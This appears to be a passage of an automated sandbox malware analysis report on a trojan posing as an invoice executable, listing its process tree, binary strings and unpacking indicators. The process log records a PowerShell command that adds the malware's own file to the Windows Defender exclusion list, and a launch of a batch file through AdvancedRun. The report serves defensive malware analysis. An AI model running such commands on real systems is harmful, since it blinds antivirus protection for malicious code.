        Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 2016 -ip 2016
        Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2016 -s 2180
        Source: C:\Windows\SysWOW64\WerFault.exeProcess created: unknown unknown
        Source: C:\Windows\explorer.exeProcess created: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe 'C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe'
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe' -Force
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess created: C:\Users\user\AppData\Local\Temp\e33cd0bd-fe57-408e-abef-c8ddfa8d2134\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\e33cd0bd-fe57-408e-abef-c8ddfa8d2134\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\e33cd0bd-fe57-408e-abef-c8ddfa8d2134\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F324E4F9-8496-40b2-A1FF-9617C1C9AFFE}\InProcServer32
        Source: Window RecorderWindow detected: More than 3 window changes detected
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
        Source: CN-Invoice-XXXXX9808-19011143287994.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
        Source: CN-Invoice-XXXXX9808-19011143287994.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
        Source: Binary string: shcore.pdb= source: WerFault.exe, 00000011.00000003.773760878.0000000004ACA000.00000004.00000040.sdmp
        Source: Binary string: rsaenh.pdb source: WerFault.exe, 00000011.00000003.773760878.0000000004ACA000.00000004.00000040.sdmp
        Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: CN-Invoice-XXXXX9808-19011143287994.exe, 00000000.00000002.981409215.0000000009040000.00000004.00000001.sdmp
        Source: Binary string: .pdb>X source: CN-Invoice-XXXXX9808-19011143287994.exe, 00000000.00000002.849394343.0000000000F89000.00000004.00000010.sdmp
        Source: Binary string: \??\C:\Windows\Microsoft.VisualBasic.pdbR source: CN-Invoice-XXXXX9808-19011143287994.exe, 00000000.00000002.854230028.000000000123D000.00000004.00000020.sdmp
        Source: Binary string: System.ni.pdb% source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: Microsoft.VisualBasic.pdbx source: WerFault.exe, 00000011.00000002.843527236.0000000004D70000.00000004.00000001.sdmp
        Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: CN-Invoice-XXXXX9808-19011143287994.exe, 00000000.00000002.854230028.000000000123D000.00000004.00000020.sdmp
        Source: Binary string: wkernel32.pdb source: WerFault.exe, 00000011.00000003.772689514.0000000004AF1000.00000004.00000001.sdmp
        Source: Binary string: bcrypt.pdb source: WerFault.exe, 00000011.00000003.773760878.0000000004ACA000.00000004.00000040.sdmp
        Source: Binary string: ucrtbase.pdb source: WerFault.exe, 00000011.00000003.773634212.0000000004AC0000.00000004.00000040.sdmp
        Source: Binary string: msvcrt.pdb source: WerFault.exe, 00000011.00000003.772689514.0000000004AF1000.00000004.00000001.sdmp
        Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 00000011.00000003.772689514.0000000004AF1000.00000004.00000001.sdmp
        Source: Binary string: wntdll.pdb source: WerFault.exe, 00000011.00000003.772689514.0000000004AF1000.00000004.00000001.sdmp
        Source: Binary string: System.Xml.pdb] source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: ml.pdb source: WerFault.exe, 00000011.00000003.772909013.0000000004ADC000.00000004.00000001.sdmp
        Source: Binary string: winnsi.pdb source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: .ni.pdb source: WerFault.exe, 00000011.00000003.772909013.0000000004ADC000.00000004.00000001.sdmp
        Source: Binary string: clr.pdb source: WerFault.exe, 00000011.00000003.773634212.0000000004AC0000.00000004.00000040.sdmp
        Source: Binary string: cryptsp.pdb source: WerFault.exe, 00000011.00000003.773760878.0000000004ACA000.00000004.00000040.sdmp
        Source: Binary string: System.Windows.Forms.pdb" source: WerFault.exe, 00000011.00000003.772909013.0000000004ADC000.00000004.00000001.sdmp
        Source: Binary string: advapi32.pdb source: WerFault.exe, 00000011.00000003.772689514.0000000004AF1000.00000004.00000001.sdmp
        Source: Binary string: ility.pdb source: WerFault.exe, 00000011.00000003.772909013.0000000004ADC000.00000004.00000001.sdmp
        Source: Binary string: wsspicli.pdb source: WerFault.exe, 00000011.00000003.772689514.0000000004AF1000.00000004.00000001.sdmp
        Source: Binary string: System.Configuration.ni.pdb" source: WerFault.exe, 00000011.00000003.772909013.0000000004ADC000.00000004.00000001.sdmp
        Source: Binary string: System.Configuration.ni.pdb% source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: Microsoft.VisualBasic.pdb source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: CLBCatQ.pdb source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: ntmarta.pdb source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: urlmon.pdb source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: Microsoft.VisualBasic.pdb] source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: System.Configuration.pdbx source: WerFault.exe, 00000011.00000002.843527236.0000000004D70000.00000004.00000001.sdmp
        Source: Binary string: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.PDB source: CN-Invoice-XXXXX9808-19011143287994.exe, 00000000.00000002.849394343.0000000000F89000.00000004.00000010.sdmp
        Source: Binary string: System.Configuration.pdb{ source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: ml.pdbe source: WerFault.exe, 00000011.00000003.772909013.0000000004ADC000.00000004.00000001.sdmp
        Source: Binary string: wkernelbase.pdb source: WerFault.exe, 00000011.00000003.772689514.0000000004AF1000.00000004.00000001.sdmp
        Source: Binary string: ole32.pdbx source: WerFault.exe, 00000011.00000003.772085355.0000000004ACA000.00000004.00000040.sdmp
        Source: Binary string: shlwapi.pdb source: WerFault.exe, 00000011.00000003.772531708.0000000004AC7000.00000004.00000040.sdmp
        Source: Binary string: mscorlib.ni.pdb source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb&;$ source: CN-Invoice-XXXXX9808-19011143287994.exe, 00000000.00000002.854050240.000000000122B000.00000004.00000020.sdmp
        Source: Binary string: System.Xml.pdbx source: WerFault.exe, 00000011.00000002.843527236.0000000004D70000.00000004.00000001.sdmp
        Source: Binary string: System.Core.pdb" source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: shell32.pdb{ source: WerFault.exe, 00000011.00000003.773760878.0000000004ACA000.00000004.00000040.sdmp
        Source: Binary string: \??\C:\Windows\Microsoft.VisualBasic.pdbN source: CN-Invoice-XXXXX9808-19011143287994.exe, 00000000.00000002.854230028.000000000123D000.00000004.00000020.sdmp
        Source: Binary string: dwmapi.pdb source: WerFault.exe, 00000011.00000003.773760878.0000000004ACA000.00000004.00000040.sdmp
        Source: Binary string: wuser32.pdbq source: WerFault.exe, 00000011.00000003.773760878.0000000004ACA000.00000004.00000040.sdmp
        Source: Binary string: mscoree.pdb source: WerFault.exe, 00000011.00000003.772689514.0000000004AF1000.00000004.00000001.sdmp
        Source: Binary string: System.Core.pdb, source: WerFault.exe, 00000011.00000003.772909013.0000000004ADC000.00000004.00000001.sdmp
        Source: Binary string: rasapi32.pdbe source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: ws2_32.pdb source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: profapi.pdbc source: WerFault.exe, 00000011.00000003.773760878.0000000004ACA000.00000004.00000040.sdmp
        Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.VisualBasic.pdb source: CN-Invoice-XXXXX9808-19011143287994.exe, 00000000.00000002.854050240.000000000122B000.00000004.00000020.sdmp
        Source: Binary string: shlwapi.pdbk source: WerFault.exe, 00000011.00000003.772531708.0000000004AC7000.00000004.00000040.sdmp
        Source: Binary string: msvcp_win.pdbS source: WerFault.exe, 00000011.00000003.773760878.0000000004ACA000.00000004.00000040.sdmp
        Source: Binary string: System.Configuration.pdb" source: WerFault.exe, 00000011.00000003.772909013.0000000004ADC000.00000004.00000001.sdmp
        Source: Binary string: iphlpapi.pdb source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: nsi.pdb source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: powrprof.pdb source: WerFault.exe, 00000011.00000003.773760878.0000000004ACA000.00000004.00000040.sdmp
        Source: Binary string: System.Configuration.pdb source: WerFault.exe, 00000011.00000003.772909013.0000000004ADC000.00000004.00000001.sdmp
        Source: Binary string: ole32.pdb source: WerFault.exe, 00000011.00000003.773760878.0000000004ACA000.00000004.00000040.sdmp
        Source: Binary string: wimm32.pdb3 source: WerFault.exe, 00000011.00000003.773760878.0000000004ACA000.00000004.00000040.sdmp
        Source: Binary string: iertutil.pdb source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: mscorlib.ni.pdbx source: WerFault.exe, 00000011.00000002.843527236.0000000004D70000.00000004.00000001.sdmp
        Source: Binary string: mscorlib.pdb" source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: msasn1.pdb source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: mscorlib.pdb source: CN-Invoice-XXXXX9808-19011143287994.exe, 00000000.00000002.981409215.0000000009040000.00000004.00000001.sdmp, WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: comctl32v582.pdb source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: comctl32v582.pdbX source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: cldapi.pdb5 source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 00000011.00000003.773760878.0000000004ACA000.00000004.00000040.sdmp
        Source: Binary string: combase.pdb source: WerFault.exe, 00000011.00000003.772531708.0000000004AC7000.00000004.00000040.sdmp
        Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: System.Drawing.pdb source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: rasman.pdb} source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: iertutil.pdb+ source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: Accessibility.pdbx source: WerFault.exe, 00000011.00000002.843527236.0000000004D70000.00000004.00000001.sdmp
        Source: Binary string: apphelp.pdb source: WerFault.exe, 00000011.00000003.772689514.0000000004AF1000.00000004.00000001.sdmp
        Source: Binary string: version.pdb/ source: WerFault.exe, 00000011.00000003.773760878.0000000004ACA000.00000004.00000040.sdmp
        Source: Binary string: rasadhlp.pdb source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: System.Core.ni.pdb{ source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: ml.ni.pdb source: WerFault.exe, 00000011.00000003.772909013.0000000004ADC000.00000004.00000001.sdmp
        Source: Binary string: dhcpcsvc6.pdbo source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: WinTypes.pdb source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: nsi.pdbX source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: dhcpcsvc.pdb source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: diasymreader.pdb_ source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: psapi.pdb) source: WerFault.exe, 00000011.00000003.773760878.0000000004ACA000.00000004.00000040.sdmp
        Source: Binary string: Accessibility.pdb source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: rawing.pdb source: WerFault.exe, 00000011.00000003.772909013.0000000004ADC000.00000004.00000001.sdmp
        Source: Binary string: winhttp.pdb\ source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: cryptsp.pdbw source: WerFault.exe, 00000011.00000003.773760878.0000000004ACA000.00000004.00000040.sdmp
        Source: Binary string: mscoreei.pdbk source: WerFault.exe, 00000011.00000003.772013885.0000000004AC2000.00000004.00000040.sdmp
        Source: Binary string: mscorlib.pdbx source: WerFault.exe, 00000011.00000002.843527236.0000000004D70000.00000004.00000001.sdmp
        Source: Binary string: CN-Invoice-XXXXX9808-19011143287994.PDB source: CN-Invoice-XXXXX9808-19011143287994.exe, 00000000.00000002.849394343.0000000000F89000.00000004.00000010.sdmp
        Source: Binary string: mscorlib.ni.pdb] source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: t.VisualBasic.pdb source: WerFault.exe, 00000011.00000003.772909013.0000000004ADC000.00000004.00000001.sdmp
        Source: Binary string: shcore.pdb source: WerFault.exe, 00000011.00000003.773760878.0000000004ACA000.00000004.00000040.sdmp
        Source: Binary string: System.Core.ni.pdb% source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: wgdi32.pdb source: WerFault.exe, 00000011.00000003.773634212.0000000004AC0000.00000004.00000040.sdmp
        Source: Binary string: System.Core.ni.pdb" source: WerFault.exe, 00000011.00000003.772909013.0000000004ADC000.00000004.00000001.sdmp
        Source: Binary string: fltLib.pdb source: WerFault.exe, 00000011.00000003.773760878.0000000004ACA000.00000004.00000040.sdmp
        Source: Binary string: edputil.pdb! source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: winnsi.pdb[ source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: shell32.pdb source: WerFault.exe, 00000011.00000003.773760878.0000000004ACA000.00000004.00000040.sdmp
        Source: Binary string: System.Core.ni.pdb source: WerFault.exe, 00000011.00000003.772909013.0000000004ADC000.00000004.00000001.sdmp
        Source: Binary string: System.Xml.ni.pdb] source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: propsys.pdb9 source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: msvcp_win.pdb source: WerFault.exe, 00000011.00000003.773760878.0000000004ACA000.00000004.00000040.sdmp
        Source: Binary string: dnsapi.pdb source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: rasapi32.pdb source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: wimm32.pdb source: WerFault.exe, 00000011.00000003.773760878.0000000004ACA000.00000004.00000040.sdmp
        Source: Binary string: rsaenh.pdbO source: WerFault.exe, 00000011.00000003.773760878.0000000004ACA000.00000004.00000040.sdmp
        Source: Binary string: C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.pdb source: CN-Invoice-XXXXX9808-19011143287994.exe, 00000000.00000002.854230028.000000000123D000.00000004.00000020.sdmp
        Source: Binary string: wwin32u.pdb source: WerFault.exe, 00000011.00000003.773760878.0000000004ACA000.00000004.00000040.sdmp
        Source: Binary string: wmswsock.pdbG source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: System.Xml.ni.pdbT source: WerFault.exe, 00000011.00000002.843527236.0000000004D70000.00000004.00000001.sdmp
        Source: Binary string: diasymreader.pdb source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: winhttp.pdb source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: wUxTheme.pdb source: WerFault.exe, 00000011.00000003.773760878.0000000004ACA000.00000004.00000040.sdmp
        Source: Binary string: Windows.StateRepositoryPS.pdb source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: mscorlib.ni.pdb% source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: System.ni.pdbT3 source: WerFault.exe, 00000011.00000002.843527236.0000000004D70000.00000004.00000001.sdmp
        Source: Binary string: rtutils.pdb source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: System.pdbx source: WerFault.exe, 00000011.00000002.843527236.0000000004D70000.00000004.00000001.sdmp
        Source: Binary string: profapi.pdb source: WerFault.exe, 00000011.00000003.773760878.0000000004ACA000.00000004.00000040.sdmp
        Source: Binary string: dhcpcsvc6.pdb source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: c:\Projects\VS2005\AdvancedRun\Release\AdvancedRun.pdb source: CN-Invoice-XXXXX9808-19011143287994.exe, 00000000.00000002.925195088.00000000042BD000.00000004.00000001.sdmp, AdvancedRun.exe, 00000003.00000000.674869735.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp, svchost.exe, 0000000C.00000002.955492913.00000000043C9000.00000004.00000001.sdmp, svchost.exe, 00000013.00000002.965974151.0000000006601000.00000004.00000001.sdmp
        Source: Binary string: System.Xml.ni.pdb source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: wgdi32full.pdb source: WerFault.exe, 00000011.00000003.773634212.0000000004AC0000.00000004.00000040.sdmp
        Source: Binary string: WLDP.pdb source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: sechost.pdb source: WerFault.exe, 00000011.00000003.772689514.0000000004AF1000.00000004.00000001.sdmp
        Source: Binary string: System.Drawing.pdb] source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: clrjit.pdb source: WerFault.exe, 00000011.00000003.773760878.0000000004ACA000.00000004.00000040.sdmp
        Source: Binary string: wUxTheme.pdbI source: WerFault.exe, 00000011.00000003.773760878.0000000004ACA000.00000004.00000040.sdmp
        Source: Binary string: dhcpcsvc.pdbi source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: rasman.pdb source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: propsys.pdb source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: msvcr120_clr0400.i386.pdb source: WerFault.exe, 00000011.00000003.773760878.0000000004ACA000.00000004.00000040.sdmp
        Source: Binary string: System.Configuration.ni.pdb source: WerFault.exe, 00000011.00000003.772909013.0000000004ADC000.00000004.00000001.sdmp
        Source: Binary string: wmswsock.pdb source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: version.pdb source: WerFault.exe, 00000011.00000003.773760878.0000000004ACA000.00000004.00000040.sdmp
        Source: Binary string: wintrust.pdb source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: System.Xml.pdb source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: System.pdb source: WerFault.exe, 00000011.00000002.843527236.0000000004D70000.00000004.00000001.sdmp
        Source: Binary string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb source: CN-Invoice-XXXXX9808-19011143287994.exe, 00000000.00000002.981409215.0000000009040000.00000004.00000001.sdmp
        Source: Binary string: bcrypt.pdbm source: WerFault.exe, 00000011.00000003.773760878.0000000004ACA000.00000004.00000040.sdmp
        Source: Binary string: rtutils.pdbs source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: System.Windows.Forms.pdb source: WerFault.exe, 00000011.00000003.772909013.0000000004ADC000.00000004.00000001.sdmp
        Source: Binary string: npNiVisualBasic.pdb source: CN-Invoice-XXXXX9808-19011143287994.exe, 00000000.00000002.849394343.0000000000F89000.00000004.00000010.sdmp
        Source: Binary string: System.Configuration.ni.pdb{ source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000011.00000003.773634212.0000000004AC0000.00000004.00000040.sdmp
        Source: Binary string: cfgmgr32.pdbE source: WerFault.exe, 00000011.00000003.773760878.0000000004ACA000.00000004.00000040.sdmp
        Source: Binary string: psapi.pdb source: WerFault.exe, 00000011.00000003.773760878.0000000004ACA000.00000004.00000040.sdmp
        Source: Binary string: fwpuclnt.pdb source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: CN-Invoice-XXXXX9808-19011143287994.exe, 00000000.00000002.854230028.000000000123D000.00000004.00000020.sdmp
        Source: Binary string: cryptbase.pdb source: WerFault.exe, 00000011.00000003.772689514.0000000004AF1000.00000004.00000001.sdmp
        Source: Binary string: cldapi.pdb source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: System.Core.pdbx source: WerFault.exe, 00000011.00000002.843527236.0000000004D70000.00000004.00000001.sdmp
        Source: Binary string: wkernelbase.pdb( source: WerFault.exe, 00000011.00000003.733692999.00000000029E6000.00000004.00000001.sdmp
        Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000011.00000003.772013885.0000000004AC2000.00000004.00000040.sdmp
        Source: Binary string: mscoreei.pdb source: WerFault.exe, 00000011.00000003.772013885.0000000004AC2000.00000004.00000040.sdmp
        Source: Binary string: System.Drawing.pdbx source: WerFault.exe, 00000011.00000002.843527236.0000000004D70000.00000004.00000001.sdmp
        Source: Binary string: combase.pdbk source: WerFault.exe, 00000011.00000003.772531708.0000000004AC7000.00000004.00000040.sdmp
        Source: Binary string: System.Core.pdb source: WerFault.exe, 00000011.00000003.772909013.0000000004ADC000.00000004.00000001.sdmp
        Source: Binary string: System.Windows.Forms.pdb{ source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: oleaut32.pdb source: WerFault.exe, 00000011.00000003.773760878.0000000004ACA000.00000004.00000040.sdmp
        Source: Binary string: System.Windows.Forms.pdbx source: WerFault.exe, 00000011.00000002.843527236.0000000004D70000.00000004.00000001.sdmp
        Source: Binary string: OneCoreUAPCommonProxyStub.pdb source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: bcryptprimitives.pdbk source: WerFault.exe, 00000011.00000003.772013885.0000000004AC2000.00000004.00000040.sdmp
        Source: Binary string: wuser32.pdb source: WerFault.exe, 00000011.00000003.773760878.0000000004ACA000.00000004.00000040.sdmp
        Source: Binary string: System.ni.pdb source: WerFault.exe, 00000011.00000003.772873228.0000000004B08000.00000004.00000001.sdmp
        Source: Binary string: ws2_32.pdbA source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: crypt32.pdb source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: edputil.pdb source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp

        Data Obfuscation:

        barindex
        .NET source code contains potential unpackerShow sources
        Source: 13.2.CasPol.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        Source: 13.2.CasPol.exe.400000.0.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        Binary contains a suspicious time stampShow sources
        Source: initial sampleStatic PE information: 0xE5412A60 [Sun Nov 18 19:39:12 2091 UTC]
        Source: C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\AdvancedRun.exeCode function: 3_2_0040289F LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeCode function: 0_2_08A27150 pushfd ; ret
        Source: C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\AdvancedRun.exeCode function: 3_2_0040B550 push eax; ret
        Source: C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\AdvancedRun.exeCode function: 3_2_0040B550 push eax; ret
        Source: C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\AdvancedRun.exeCode function: 3_2_0040B50D push ecx; ret
        Source: C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\AdvancedRun.exeCode function: 4_2_0040B550 push eax; ret
        Source: C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\AdvancedRun.exeCode function: 4_2_0040B550 push eax; ret
        Source: C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\AdvancedRun.exeCode function: 4_2_0040B50D push ecx; ret
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_033CF580 pushad ; ret
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_03464280 pushad ; ret
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_0346D7B1 push 000000C3h; ret
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_0346D6F0 push 000000C3h; ret
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_04E0F0D4 push 850FD83Bh; ret
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeCode function: 12_2_06C257F0 pushfd ; ret
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeCode function: 19_2_00AC57F0 pushfd ; ret
